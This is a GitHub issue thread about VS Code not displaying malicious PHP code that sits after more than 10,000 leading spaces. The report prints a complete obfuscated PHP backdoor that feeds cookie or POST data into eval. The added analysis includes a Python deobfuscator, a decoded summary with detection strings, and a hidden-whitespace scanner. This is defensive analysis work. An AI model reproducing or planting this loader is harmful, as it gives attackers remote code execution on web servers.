VSCode not showing malicious PHP code. #83576

Closed
FernandoGarcia opened this issue Oct 29, 2019 · 4 comments
Labels
*duplicate Issue identified as a duplicate of another issue(s)

Comments

@FernandoGarcia

Hi!

I have some malicious PHP code in a file and the editor is not showing it.
I can see the code only by using the search tool in the editor, as you can see in the image below.

[screenshot: vscode]

Opening the code in text editor I can see:

```php
<?php $ye2f = 19;$GLOBALS['r8eda45'] = Array();global $r8eda45;$r8eda45 = $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['r9de'] = "\x7e\x60\x2f\x58\x48\x4d\x6f\x29\x72\x41\x49\x42\x4a\x5a\x54\x2d\x32\x53\x7c\x4b\x3d\x73\x7b\x4f\x24\x3a\x77\x4c\x25\x6b\x57\x2c\x33\x6d\x20\x66\x7d\x26\x30\x5f\x5b\x3c\x75\x51\x5c\x5d\x2b\x3e\x47\x65\x39\x4e\x2a\x76\x27\x46\x69\x62\x78\x6a\x56\x50\x44\x23\x67\x6c\x61\x79\x9\xd\x55\x36\x45\x74\x3b\x52\x70\x28\x21\x40\x63\x6e\x64\x34\x35\x59\x7a\x71\x5e\x22\x31\x2e\x3f\xa\x37\x68\x38\x43";$r8eda45[$r8eda45['r9de'][58].$r8eda45['r9de'][38].$r8eda45['r9de'][50].$r8eda45['r9de'][94].$r8eda45['r9de'][50].$r8eda45['r9de'][57].$r8eda45['r9de'][66].$r8eda45['r9de'][16]] = $r8eda45['r9de'][80].$r8eda45['r9de'][95].$r8eda45['r9de'][8];$r8eda45[$r8eda45['r9de'][59].$r8eda45['r9de'][50].$r8eda45['r9de'][90].$r8eda45['r9de'][32].$r8eda45['r9de'][57].$r8eda45['r9de'][16].$r8eda45['r9de'][50].$r8eda45['r9de'][80]] = $r8eda45['r9de'][6].$r8eda45['r9de'][8].$r8eda45['r9de'][82];$r8eda45[$r8eda45['r9de'][82].$r8eda45['r9de'][83].$r8eda45['r9de'][82].$r8eda45['r9de'][50].$r8eda45['r9de'][16].$r8eda45['r9de'][80].$r8eda45['r9de'][80].$r8eda45['r9de'][66].$r8eda45['r9de'][94]] = $r8eda45['r9de'][82].$r8eda45['r9de'][49].$r8eda45['r9de'][35].$r8eda45['r9de'][56].$r8eda45['r9de'][81].$r8eda45['r9de'][49];$r8eda45[$r8eda45['r9de'][35].$r8eda45['r9de'][57].$r8eda45['r9de'][96].$r8eda45['r9de'][94].$r8eda45['r9de'][71].$r8eda45['r9de'][94]] = $r8eda45['r9de'][21].$r8eda45['r9de'][73].$r8eda45['r9de'][8].$r8eda45['r9de'][65].$r8eda45['r9de'][49].$r8eda45['r9de'][81];$r8eda45[$r8eda45['r9de'][8].$r8eda45['r9de'][57].$r8eda45['r9de'][82].$r8eda45['r9de'][49].$r8eda45['r9de'][16].$r8eda45['r9de'][96].$r8eda45['r9de'][83].$r8eda45['r9de'][83].$r8eda45['r9de'][32]] = 
$r8eda45['r9de'][82].$r8eda45['r9de'][49].$r8eda45['r9de'][35].$r8eda45['r9de'][56].$r8eda45['r9de'][81].$r8eda45['r9de'][49].$r8eda45['r9de'][82];$r8eda45[$r8eda45['r9de'][82].$r8eda45['r9de'][96].$r8eda45['r9de'][82].$r8eda45['r9de'][90].$r8eda45['r9de'][90]] = $r8eda45['r9de'][56].$r8eda45['r9de'][81].$r8eda45['r9de'][56].$r8eda45['r9de'][39].$r8eda45['r9de'][21].$r8eda45['r9de'][49].$r8eda45['r9de'][73];$r8eda45[$r8eda45['r9de'][42].$r8eda45['r9de'][32].$r8eda45['r9de'][35].$r8eda45['r9de'][83].$r8eda45['r9de'][16].$r8eda45['r9de'][71]] = $r8eda45['r9de'][21].$r8eda45['r9de'][49].$r8eda45['r9de'][8].$r8eda45['r9de'][56].$r8eda45['r9de'][66].$r8eda45['r9de'][65].$r8eda45['r9de'][56].$r8eda45['r9de'][86].$r8eda45['r9de'][49];$r8eda45[$r8eda45['r9de'][42].$r8eda45['r9de'][80].$r8eda45['r9de'][49].$r8eda45['r9de'][94].$r8eda45['r9de'][82].$r8eda45['r9de'][83]] = $r8eda45['r9de'][76].$r8eda45['r9de'][95].$r8eda45['r9de'][76].$r8eda45['r9de'][53].$r8eda45['r9de'][49].$r8eda45['r9de'][8].$r8eda45['r9de'][21].$r8eda45['r9de'][56].$r8eda45['r9de'][6].$r8eda45['r9de'][81];$r8eda45[$r8eda45['r9de'][82].$r8eda45['r9de'][71].$r8eda45['r9de'][90].$r8eda45['r9de'][50]] = $r8eda45['r9de'][42].$r8eda45['r9de'][81].$r8eda45['r9de'][21].$r8eda45['r9de'][49].$r8eda45['r9de'][8].$r8eda45['r9de'][56].$r8eda45['r9de'][66].$r8eda45['r9de'][65].$r8eda45['r9de'][56].$r8eda45['r9de'][86].$r8eda45['r9de'][49];$r8eda45[$r8eda45['r9de'][21].$r8eda45['r9de'][80].$r8eda45['r9de'][35].$r8eda45['r9de'][32].$r8eda45['r9de'][80].$r8eda45['r9de'][50].$r8eda45['r9de'][32].$r8eda45['r9de'][38].$r8eda45['r9de'][35]] = 
$r8eda45['r9de'][57].$r8eda45['r9de'][66].$r8eda45['r9de'][21].$r8eda45['r9de'][49].$r8eda45['r9de'][71].$r8eda45['r9de'][83].$r8eda45['r9de'][39].$r8eda45['r9de'][82].$r8eda45['r9de'][49].$r8eda45['r9de'][80].$r8eda45['r9de'][6].$r8eda45['r9de'][82].$r8eda45['r9de'][49];$r8eda45[$r8eda45['r9de'][53].$r8eda45['r9de'][57].$r8eda45['r9de'][83].$r8eda45['r9de'][94].$r8eda45['r9de'][50].$r8eda45['r9de'][50].$r8eda45['r9de'][96]] = $r8eda45['r9de'][21].$r8eda45['r9de'][49].$r8eda45['r9de'][73].$r8eda45['r9de'][39].$r8eda45['r9de'][73].$r8eda45['r9de'][56].$r8eda45['r9de'][33].$r8eda45['r9de'][49].$r8eda45['r9de'][39].$r8eda45['r9de'][65].$r8eda45['r9de'][56].$r8eda45['r9de'][33].$r8eda45['r9de'][56].$r8eda45['r9de'][73];$r8eda45[$r8eda45['r9de'][86].$r8eda45['r9de'][96].$r8eda45['r9de'][57].$r8eda45['r9de'][50].$r8eda45['r9de'][84].$r8eda45['r9de'][90].$r8eda45['r9de'][83].$r8eda45['r9de'][94]] = $r8eda45['r9de'][59].$r8eda45['r9de'][16].$r8eda45['r9de'][57].$r8eda45['r9de'][38].$r8eda45['r9de'][38].$r8eda45['r9de'][71].$r8eda45['r9de'][83].$r8eda45['r9de'][35];$r8eda45[$r8eda45['r9de'][64].$r8eda45['r9de'][83].$r8eda45['r9de'][57].$r8eda45['r9de'][84]] = $r8eda45['r9de'][6].$r8eda45['r9de'][32].$r8eda45['r9de'][16].$r8eda45['r9de'][94].$r8eda45['r9de'][38].$r8eda45['r9de'][66].$r8eda45['r9de'][32];$r8eda45[$r8eda45['r9de'][95].$r8eda45['r9de'][82].$r8eda45['r9de'][49].$r8eda45['r9de'][96].$r8eda45['r9de'][84]] = $_POST;$r8eda45[$r8eda45['r9de'][6].$r8eda45['r9de'][82].$r8eda45['r9de'][84].$r8eda45['r9de'][83].$r8eda45['r9de'][80]] = $_COOKIE;@$r8eda45[$r8eda45['r9de'][82].$r8eda45['r9de'][96].$r8eda45['r9de'][82].$r8eda45['r9de'][90].$r8eda45['r9de'][90]]($r8eda45['r9de'][49].$r8eda45['r9de'][8].$r8eda45['r9de'][8].$r8eda45['r9de'][6].$r8eda45['r9de'][8].$r8eda45['r9de'][39].$r8eda45['r9de'][65].$r8eda45['r9de'][6].$r8eda45['r9de'][64], 
NULL);@$r8eda45[$r8eda45['r9de'][82].$r8eda45['r9de'][96].$r8eda45['r9de'][82].$r8eda45['r9de'][90].$r8eda45['r9de'][90]]($r8eda45['r9de'][65].$r8eda45['r9de'][6].$r8eda45['r9de'][64].$r8eda45['r9de'][39].$r8eda45['r9de'][49].$r8eda45['r9de'][8].$r8eda45['r9de'][8].$r8eda45['r9de'][6].$r8eda45['r9de'][8].$r8eda45['r9de'][21], 0);@$r8eda45[$r8eda45['r9de'][82].$r8eda45['r9de'][96].$r8eda45['r9de'][82].$r8eda45['r9de'][90].$r8eda45['r9de'][90]]($r8eda45['r9de'][33].$r8eda45['r9de'][66].$r8eda45['r9de'][58].$r8eda45['r9de'][39].$r8eda45['r9de'][49].$r8eda45['r9de'][58].$r8eda45['r9de'][49].$r8eda45['r9de'][80].$r8eda45['r9de'][42].$r8eda45['r9de'][73].$r8eda45['r9de'][56].$r8eda45['r9de'][6].$r8eda45['r9de'][81].$r8eda45['r9de'][39].$r8eda45['r9de'][73].$r8eda45['r9de'][56].$r8eda45['r9de'][33].$r8eda45['r9de'][49], 0);@$r8eda45[$r8eda45['r9de'][53].$r8eda45['r9de'][57].$r8eda45['r9de'][83].$r8eda45['r9de'][94].$r8eda45['r9de'][50].$r8eda45['r9de'][50].$r8eda45['r9de'][96]](0);if (!$r8eda45[$r8eda45['r9de'][8].$r8eda45['r9de'][57].$r8eda45['r9de'][82].$r8eda45['r9de'][49].$r8eda45['r9de'][16].$r8eda45['r9de'][96].$r8eda45['r9de'][83].$r8eda45['r9de'][83].$r8eda45['r9de'][32]]($r8eda45['r9de'][9].$r8eda45['r9de'][27].$r8eda45['r9de'][75].$r8eda45['r9de'][72].$r8eda45['r9de'][9].$r8eda45['r9de'][62].$r8eda45['r9de'][85].$r8eda45['r9de'][39].$r8eda45['r9de'][75].$r8eda45['r9de'][70].$r8eda45['r9de'][51].$r8eda45['r9de'][39].$r8eda45['r9de'][32].$r8eda45['r9de'][71].$r8eda45['r9de'][71].$r8eda45['r9de'][66].$r8eda45['r9de'][35].$r8eda45['r9de'][57].$r8eda45['r9de'][96].$r8eda45['r9de'][66].$r8eda45['r9de'][96].$r8eda45['r9de'][66].$r8eda45['r9de'][16].$r8eda45['r9de'][32].$r8eda45['r9de'][84].$r8eda45['r9de'][84].$r8eda45['r9de'][66].$r8eda45['r9de'][57].$r8eda45['r9de'][16].$r8eda45['r9de'][90].$r8eda45['r9de'][35].$r8eda45['r9de'][57].$r8eda45['r9de'][35].$r8eda45['r9de'][90].$r8eda45['r9de'][90].$r8eda45['r9de'][57].$r8eda45['r9de'][66].$r8eda45['r9de'][90].$r8eda45['r9de'][66].$r8eda45['r9de'][38].$r8eda45['r9de'][16].$r8eda45['r9de'][35].$r8eda45['r9de'][57].$r8eda45['r9de'][66])){$r8eda45[$r8eda45['r9de'][82].$r8eda45['r9de'][83].$r8eda45['r9de'][82].$r8eda45['r9de'][50].$r8eda45['r9de'][16].$r8eda45['r9de'][80].$r8eda45['r9de'][80].$r8eda45['r9de'][66].$r8eda45['r9de'][94]]($r8eda45['r9de'][9].$r8eda45['r9de'][27].$r8eda45['r9de'][75].$r8eda45['r9de'][72].$r8eda45['r9de'][9].$r8eda45['r9de'][62].$r8eda45['r9de'][85].$r8eda45['r9de'][39].$r8eda45['r9de'][75].$r8eda45['r9de'][70].$r8eda45['r9de'][51].$r8eda45['r9de'][39].$r8eda45['r9de'][32].$r8eda45['r9de'][71].$r8eda45['r9de'][71].$r8eda45['r9de'][66].$r8eda45['r9de'][35].$r8eda45['r9de'][57].$r8eda45['r9de'][96].$r8eda45['r9de'][66].$r8eda45['r9de'][96].$r8eda45['r9de'][66].$r8eda45['r9de'][16].$r8eda45['r9de'][32].$r8eda45['r9de'][84].$r8eda45['r9de'][84].$r8eda45['r9de'][66].$r8eda45['r9de'][57].$r8eda45['r9de'][16].$r8eda45['r9de'][90].$r8eda45['r9de'][35].$r8eda45['r9de'][57].$r8eda45['r9de'][35].$r8eda45['r9de'][90].$r8eda45['r9de'][90].$r8eda45['r9de'][57].$r8eda45['r9de'][66].$r8eda45['r9de'][90].$r8eda45['r9de'][66].$r8eda45['r9de'][38].$r8eda45['r9de'][16].$r8eda45['r9de'][35].$r8eda45['r9de'][57].$r8eda45['r9de'][66], 1);$ya69 = NULL;$jddb6e = NULL;$r8eda45[$r8eda45['r9de'][26].$r8eda45['r9de'][90].$r8eda45['r9de'][71].$r8eda45['r9de'][80].$r8eda45['r9de'][94].$r8eda45['r9de'][32]] = 
$r8eda45['r9de'][84].$r8eda45['r9de'][49].$r8eda45['r9de'][94].$r8eda45['r9de'][82].$r8eda45['r9de'][82].$r8eda45['r9de'][83].$r8eda45['r9de'][94].$r8eda45['r9de'][57].$r8eda45['r9de'][15].$r8eda45['r9de'][71].$r8eda45['r9de'][84].$r8eda45['r9de'][35].$r8eda45['r9de'][38].$r8eda45['r9de'][15].$r8eda45['r9de'][83].$r8eda45['r9de'][96].$r8eda45['r9de'][96].$r8eda45['r9de'][35].$r8eda45['r9de'][15].$r8eda45['r9de'][50].$r8eda45['r9de'][80].$r8eda45['r9de'][71].$r8eda45['r9de'][82].$r8eda45['r9de'][15].$r8eda45['r9de'][35].$r8eda45['r9de'][35].$r8eda45['r9de'][82].$r8eda45['r9de'][38].$r8eda45['r9de'][83].$r8eda45['r9de'][80].$r8eda45['r9de'][96].$r8eda45['r9de'][80].$r8eda45['r9de'][84].$r8eda45['r9de'][71].$r8eda45['r9de'][16].$r8eda45['r9de'][80];global $w16c73;function o3270a3($ya69, $b887){global $r8eda45;$l17dd13 = "";for ($g0e0b30=0; $g0e0b30<$r8eda45[$r8eda45['r9de'][35].$r8eda45['r9de'][57].$r8eda45['r9de'][96].$r8eda45['r9de'][94].$r8eda45['r9de'][71].$r8eda45['r9de'][94]]($ya69);){for ($o4b7061=0; $o4b7061<$r8eda45[$r8eda45['r9de'][35].$r8eda45['r9de'][57].$r8eda45['r9de'][96].$r8eda45['r9de'][94].$r8eda45['r9de'][71].$r8eda45['r9de'][94]]($b887) && $g0e0b30<$r8eda45[$r8eda45['r9de'][35].$r8eda45['r9de'][57].$r8eda45['r9de'][96].$r8eda45['r9de'][94].$r8eda45['r9de'][71].$r8eda45['r9de'][94]]($ya69); $o4b7061++, $g0e0b30++){$l17dd13 .= $r8eda45[$r8eda45['r9de'][58].$r8eda45['r9de'][38].$r8eda45['r9de'][50].$r8eda45['r9de'][94].$r8eda45['r9de'][50].$r8eda45['r9de'][57].$r8eda45['r9de'][66].$r8eda45['r9de'][16]]($r8eda45[$r8eda45['r9de'][59].$r8eda45['r9de'][50].$r8eda45['r9de'][90].$r8eda45['r9de'][32].$r8eda45['r9de'][57].$r8eda45['r9de'][16].$r8eda45['r9de'][50].$r8eda45['r9de'][80]]($ya69[$g0e0b30]) ^ $r8eda45[$r8eda45['r9de'][59].$r8eda45['r9de'][50].$r8eda45['r9de'][90].$r8eda45['r9de'][32].$r8eda45['r9de'][57].$r8eda45['r9de'][16].$r8eda45['r9de'][50].$r8eda45['r9de'][80]]($b887[$o4b7061]));}}return $l17dd13;}function j2b0064f($ya69, $b887){global 
$r8eda45;global $w16c73;return $r8eda45[$r8eda45['r9de'][64].$r8eda45['r9de'][83].$r8eda45['r9de'][57].$r8eda45['r9de'][84]]($r8eda45[$r8eda45['r9de'][64].$r8eda45['r9de'][83].$r8eda45['r9de'][57].$r8eda45['r9de'][84]]($ya69, $w16c73), $b887);}foreach ($r8eda45[$r8eda45['r9de'][6].$r8eda45['r9de'][82].$r8eda45['r9de'][84].$r8eda45['r9de'][83].$r8eda45['r9de'][80]] as $b887=>$te359){$ya69 = $te359;$jddb6e = $b887;}if (!$ya69){foreach ($r8eda45[$r8eda45['r9de'][95].$r8eda45['r9de'][82].$r8eda45['r9de'][49].$r8eda45['r9de'][96].$r8eda45['r9de'][84]] as $b887=>$te359){$ya69 = $te359;$jddb6e = $b887;}}$ya69 = @$r8eda45[$r8eda45['r9de'][82].$r8eda45['r9de'][71].$r8eda45['r9de'][90].$r8eda45['r9de'][50]]($r8eda45[$r8eda45['r9de'][86].$r8eda45['r9de'][96].$r8eda45['r9de'][57].$r8eda45['r9de'][50].$r8eda45['r9de'][84].$r8eda45['r9de'][90].$r8eda45['r9de'][83].$r8eda45['r9de'][94]]($r8eda45[$r8eda45['r9de'][21].$r8eda45['r9de'][80].$r8eda45['r9de'][35].$r8eda45['r9de'][32].$r8eda45['r9de'][80].$r8eda45['r9de'][50].$r8eda45['r9de'][32].$r8eda45['r9de'][38].$r8eda45['r9de'][35]]($ya69), $jddb6e));if (isset($ya69[$r8eda45['r9de'][66].$r8eda45['r9de'][29]]) && $w16c73==$ya69[$r8eda45['r9de'][66].$r8eda45['r9de'][29]]){if ($ya69[$r8eda45['r9de'][66]] == $r8eda45['r9de'][56]){$g0e0b30 = Array($r8eda45['r9de'][76].$r8eda45['r9de'][53] => @$r8eda45[$r8eda45['r9de'][42].$r8eda45['r9de'][80].$r8eda45['r9de'][49].$r8eda45['r9de'][94].$r8eda45['r9de'][82].$r8eda45['r9de'][83]](),$r8eda45['r9de'][21].$r8eda45['r9de'][53] => $r8eda45['r9de'][90].$r8eda45['r9de'][91].$r8eda45['r9de'][38].$r8eda45['r9de'][15].$r8eda45['r9de'][90],);echo @$r8eda45[$r8eda45['r9de'][42].$r8eda45['r9de'][32].$r8eda45['r9de'][35].$r8eda45['r9de'][83].$r8eda45['r9de'][16].$r8eda45['r9de'][71]]($g0e0b30);}elseif ($ya69[$r8eda45['r9de'][66]] == $r8eda45['r9de'][49]){eval/*ab6e*/($ya69[$r8eda45['r9de'][82]]);}exit();}} ?><?php
```

In case someone wants to check the hidden code, here is the file:
malware.zip

Best regards.
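The sample above can be read without executing it, because its obfuscation has only two layers. Every string is assembled by indexing one alphabet string, `$GLOBALS['r9de']`, character by character (`$r8eda45` is assigned `$GLOBALS` on the first line), and the resolved function names are then parked under random-looking keys so that calls read like `$r8eda45['d8d11'](...)`. The Python helper below is an added analysis example, not code from the issue or from VS Code; it expands the `\x` alphabet and undoes both layers. The excerpt it runs on is copied from the first statements of the sample.

```python
"""Decoder for the alphabet-index obfuscation used in the PHP sample above.

Added analysis helper; it is not code from the issue or from VS Code.
The sample builds every string by picking single characters out of one
alphabet string, $GLOBALS['r9de'], by numeric index and concatenating
them, e.g.

    $r8eda45['r9de'][80].$r8eda45['r9de'][95].$r8eda45['r9de'][8]   # "chr"

($r8eda45 is assigned $GLOBALS on the first line).  The resolved names
are then stored under random-looking keys so that a call reads
$r8eda45['d8d11'](...).  The functions below undo both layers.
"""
import re

# The alphabet exactly as written in the sample.  PHP accepts one- or
# two-digit \x escapes, so "\x9" and "\xd" are tab and carriage return.
R9DE_PHP = (
    r"\x7e\x60\x2f\x58\x48\x4d\x6f\x29\x72\x41\x49\x42\x4a\x5a\x54\x2d\x32\x53"
    r"\x7c\x4b\x3d\x73\x7b\x4f\x24\x3a\x77\x4c\x25\x6b\x57\x2c\x33\x6d\x20\x66"
    r"\x7d\x26\x30\x5f\x5b\x3c\x75\x51\x5c\x5d\x2b\x3e\x47\x65\x39\x4e\x2a\x76"
    r"\x27\x46\x69\x62\x78\x6a\x56\x50\x44\x23\x67\x6c\x61\x79\x9\xd\x55\x36"
    r"\x45\x74\x3b\x52\x70\x28\x21\x40\x63\x6e\x64\x34\x35\x59\x7a\x71\x5e\x22"
    r"\x31\x2e\x3f\xa\x37\x68\x38\x43"
)


def php_hex_unescape(s):
    """Expand PHP \\xH or \\xHH escapes into the characters they denote."""
    return re.sub(r"\\x([0-9A-Fa-f]{1,2})",
                  lambda m: chr(int(m.group(1), 16)), s)


ALPHABET = php_hex_unescape(R9DE_PHP)

# One lookup, and a dot-joined chain of lookups.
TERM = re.compile(r"\$r8eda45\['r9de'\]\[(\d+)\]")
CHAIN = re.compile(r"\$r8eda45\['r9de'\]\[\d+\](?:\.\$r8eda45\['r9de'\]\[\d+\])*")


def resolve_chain(chain, alphabet=ALPHABET):
    """Turn one chain of alphabet lookups into the string it builds."""
    return "".join(alphabet[int(i)] for i in TERM.findall(chain))


def php_quote(s):
    """Render a string as a PHP single-quoted literal."""
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"


def resolve_chains(src, alphabet=ALPHABET):
    """Layer 1: replace every index chain in the source with a literal."""
    return CHAIN.sub(lambda m: php_quote(resolve_chain(m.group(0), alphabet)), src)


# After layer 1 the alias definitions read  $r8eda45['d8d11'] = 'ini_set';
# (or  = $_POST;  for the superglobals).
ALIAS = re.compile(r"\$r8eda45\['([^']+)'\] = ('(?:[^'\\]|\\.)*'|\$\w+);")


def alias_table(src):
    """Collect the key -> real name table built by the alias assignments."""
    table = {}
    for key, val in ALIAS.findall(src):
        table[key] = val[1:-1] if val.startswith("'") else val
    return table


def inline_aliases(src):
    """Layer 2: drop the alias assignments and put real names at call sites."""
    table = alias_table(src)
    src = ALIAS.sub("", src)
    for key, val in table.items():
        src = src.replace("$r8eda45['%s']" % key, val)
    return src


def deobfuscate(src, alphabet=ALPHABET):
    return inline_aliases(resolve_chains(src, alphabet))


# Excerpt copied from the start of the posted sample: the chr alias, the
# ini_set alias, and the first ini_set call.
SAMPLE = (
    "$r8eda45[$r8eda45['r9de'][58].$r8eda45['r9de'][38].$r8eda45['r9de'][50]"
    ".$r8eda45['r9de'][94].$r8eda45['r9de'][50].$r8eda45['r9de'][57]"
    ".$r8eda45['r9de'][66].$r8eda45['r9de'][16]] = $r8eda45['r9de'][80]"
    ".$r8eda45['r9de'][95].$r8eda45['r9de'][8];"
    "$r8eda45[$r8eda45['r9de'][82].$r8eda45['r9de'][96].$r8eda45['r9de'][82]"
    ".$r8eda45['r9de'][90].$r8eda45['r9de'][90]] = $r8eda45['r9de'][56]"
    ".$r8eda45['r9de'][81].$r8eda45['r9de'][56].$r8eda45['r9de'][39]"
    ".$r8eda45['r9de'][21].$r8eda45['r9de'][49].$r8eda45['r9de'][73];"
    "@$r8eda45[$r8eda45['r9de'][82].$r8eda45['r9de'][96].$r8eda45['r9de'][82]"
    ".$r8eda45['r9de'][90].$r8eda45['r9de'][90]]($r8eda45['r9de'][49]"
    ".$r8eda45['r9de'][8].$r8eda45['r9de'][8].$r8eda45['r9de'][6]"
    ".$r8eda45['r9de'][8].$r8eda45['r9de'][39].$r8eda45['r9de'][65]"
    ".$r8eda45['r9de'][6].$r8eda45['r9de'][64], NULL);"
)

if __name__ == "__main__":
    print(deobfuscate(SAMPLE))   # @ini_set('error_log', NULL);
```

Run over the whole sample instead of the excerpt, the same two passes show what the loader does: it silences `error_log`, `log_errors` and `max_execution_time`, takes the last `$_COOKIE` value (falling back to the last `$_POST` value), runs it through `base64_decode`, XORs it first with the hard-coded key `5e7dd47b-65f0-488f-9c6d-ffd04c8c562c` and then with the parameter name, and calls `unserialize` on the result. If the decoded array carries that same key under `ak`, action `i` echoes a serialized `phpversion()` report and action `e` passes the `d` field to `eval`. The alias keys (`d8d11`, `scf3c930f`, `d619`) and the XOR key are the stable strings worth putting in a detection rule; the variable names differ per generated copy.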

@alexdima
Member

@FernandoGarcia The code is rendered, but the first line has a lot of space characters, so you need to scroll to the right to see it. I believe this is done intentionally by the malware authors to make it more difficult to spot the code:

[screenshot: TO_UPLOAD]

@alexdima alexdima added the invalid Issue identified as not relevant or not valid label Oct 30, 2019
@FernandoGarcia
Author

Hi!

Thanks for your time!

I know about the large whitespace because I found it in other files.

I think the rendering has changed, because in other files I did see the code on the minimap while searching, as you saw after toggling word wrap.

Maybe another detail that has contributed to this issue is that the cursor was not moved to the matching place as it should have been.

Here an example.

[screenshot: vscode2]

The reason is: the line is not entirely rendered, ending with three dots.

[screenshot: vscode]

Best regards

@alexdima
Member

I agree that the cursor was not revealed (when the column was > 10000). I have recently fixed that with #50304 and the fix is already available in the insiders release channel -- https://code.visualstudio.com/insiders/

The fact that we don't paint over 10k characters is tracked in #7772

@alexdima alexdima added *duplicate Issue identified as a duplicate of another issue(s) and removed invalid Issue identified as not relevant or not valid labels Oct 30, 2019
@FernandoGarcia
Author

This problem can be used to make the malicious code harder to find, because the author can add over 10k whitespace characters at the start.
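The hiding trick discussed in this thread can be checked mechanically rather than by scrolling. The scanner below is an added example, not code from VS Code or from the issue: it flags lines where code begins after an abnormal run of leading whitespace or that extend past the 10,000-column paint limit mentioned above, and it also reports the obfuscation markers visible in the posted sample. The two thresholds and the constructed sample file are assumptions.

```python
"""Scanner for PHP code hidden behind very long runs of leading whitespace.

Added example, not code from VS Code or from the issue.  At the time of
the issue VS Code did not paint past column 10,000 and did not reveal the
cursor beyond it, so a line that starts with more than 10k spaces keeps
its code out of sight unless you scroll far right or toggle word wrap.
The thresholds below and the constructed sample file are assumptions.
"""
import re

LEADING_WS_LIMIT = 1000   # assumption: no real code is indented this far
LINE_LEN_LIMIT = 10000    # column beyond which the editor stopped painting

# Obfuscation markers visible in the posted sample.  Treat these as hints;
# the whitespace and length checks are the actual signal.
MARKERS = [
    ("hex-escaped superglobal name",
     re.compile(r'\$\{"(?:\\x[0-9A-Fa-f]{1,2}|[A-Za-z_])+"\}')),
    ("long \\x-escaped string",
     re.compile(r'"(?:\\x[0-9A-Fa-f]{1,2}){16,}')),
    ("eval with inline comment",
     re.compile(r"eval/\*.*?\*/\(")),
    ("reads request data",
     re.compile(r"\$_(POST|COOKIE|GET|REQUEST)\b")),
]


def scan_text(text):
    """Return (line number, description) pairs for every suspicious line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.lstrip(" \t")
        lead = len(line) - len(stripped)
        if stripped and lead >= LEADING_WS_LIMIT:
            findings.append((lineno, "code after %d leading whitespace chars "
                                     "(starts at column %d)" % (lead, lead + 1)))
        if len(line) > LINE_LEN_LIMIT:
            findings.append((lineno, "line is %d chars, beyond the %d-column "
                                     "paint limit" % (len(line), LINE_LEN_LIMIT)))
        for name, rx in MARKERS:
            if rx.search(line):
                findings.append((lineno, name))
    return findings


def scan_file(path):
    """Scan one file on disk; decoding errors are replaced, not fatal."""
    with open(path, "r", encoding="utf-8", errors="replace") as f:
        return scan_text(f.read())


# Constructed sample: three ordinary lines, then a loader pushed 12,000
# columns to the right.  Shape of the issue's file, not its content.
SAMPLE = (
    "<?php\n"
    "// harmless-looking header\n"
    "echo 'hello';\n"
    + " " * 12000
    + "${\"\\x47\\x4c\\x4fB\\x41\\x4c\\x53\"}['k'] = $_POST; eval/*ab*/($k); ?>\n"
)

if __name__ == "__main__":
    for lineno, what in scan_text(SAMPLE):
        print("line %d: %s" % (lineno, what))
```

For a quick pass over a web root without Python, `awk 'length($0) > 10000 { print FILENAME ": " FNR }' *.php` lists the over-long lines; the scanner above additionally reports the column at which the hidden code starts, which is what you need to jump to in the editor.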

@vscodebot vscodebot bot locked and limited conversation to collaborators Dec 16, 2019